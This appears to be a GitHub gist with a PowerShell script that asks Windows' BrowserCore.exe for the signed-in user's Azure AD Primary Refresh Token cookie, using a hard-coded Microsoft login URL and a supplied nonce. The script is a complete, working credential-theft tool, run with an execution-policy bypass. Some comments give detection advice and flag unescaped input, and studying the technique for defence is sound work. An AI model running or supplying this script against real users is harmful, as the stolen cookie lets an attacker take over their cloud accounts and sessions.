@tijldeneut
Last active August 9, 2021 13:58
RequestPRTToken.ps1
## Written by Photubias, based on https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/
## Purpose: builds a "GetCookies" JSON request carrying the supplied sso_nonce, sends it to
## BrowserCore.exe over stdin, and prints whatever the helper writes to stdout.
## Per the write-up referenced above, the reply carries the signed-in user's PRT cookie, so the
## output is a credential: keep it out of logs, transcripts and shared terminals.
## Defender note: the script requests no elevation; it starts BrowserCore.exe as the current user.
## BrowserCore.exe is normally started by a browser as a native-messaging host, so process-creation
## telemetry showing it with a parent such as powershell.exe is worth alerting on.
## NOTE(review): confirm the expected parent processes in your own environment before tuning a rule.
## Example: powershell -ep bypass .\RequestPRTToken.ps1
## The example passes no nonce; because Nonce is mandatory, PowerShell prompts for it.
## "-ep bypass" skips the execution-policy check for this one invocation.
[CmdletBinding()]
Param (
# Nonce: the sso_nonce value to embed in the request; it is appended to the query string below as-is.
[Parameter(Mandatory=$True,Position=1)]$Nonce
)
## The nonce and the full query below are the author's sample values, kept commented out for reference.
## Example of a nonce: AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA
#$nonce = 'AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA'
#$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce=AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA"}'
# Build the request: everything except the trailing sso_nonce value is a fixed, hard-coded authorize URL.
# NOTE(review): $Nonce is concatenated into the JSON and the URL without validation or escaping,
# so a value containing a double quote or '&' changes the structure of the request.
$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce='+$Nonce+'"}'
# Encode the JSON request as UTF-8 bytes; the length prefix written below is this byte count.
$data = [system.Text.Encoding]::UTF8.GetBytes($query)
# Describe the child process: the helper binary is started directly (no shell) with stdin and
# stdout redirected, so the request can be written to it and its reply captured.
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName = "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
# On older systems this could be C:\Windows\BrowserCore\browsercore.exe
$ProcessInfo.RedirectStandardInput = $true
$ProcessInfo.RedirectStandardOutput = $true
$ProcessInfo.UseShellExecute = $false
$Proc = New-Object System.Diagnostics.Process
$Proc.StartInfo = $ProcessInfo
# Start() returns a boolean; Out-Null keeps it out of the script's output.
$Proc.Start() | Out-Null
# Message framing: a 4-byte Int32 length (BinaryWriter writes it little-endian) followed by the
# JSON bytes, written to the raw stdin stream of the helper.
$Writer = new-object System.IO.BinaryWriter($proc.StandardInput.BaseStream);
$Writer.Write([int]$data.length)
$Writer.Write($data, 0, $data.length)
$Writer.flush()
# Closing the writer also closes the helper's stdin.
$writer.close()
# Wait for the helper to exit, then emit everything it wrote to stdout; this is the script's only
# output and, per the header, should be treated as sensitive.
$Proc.WaitForExit()
$Proc.StandardOutput.ReadToEnd()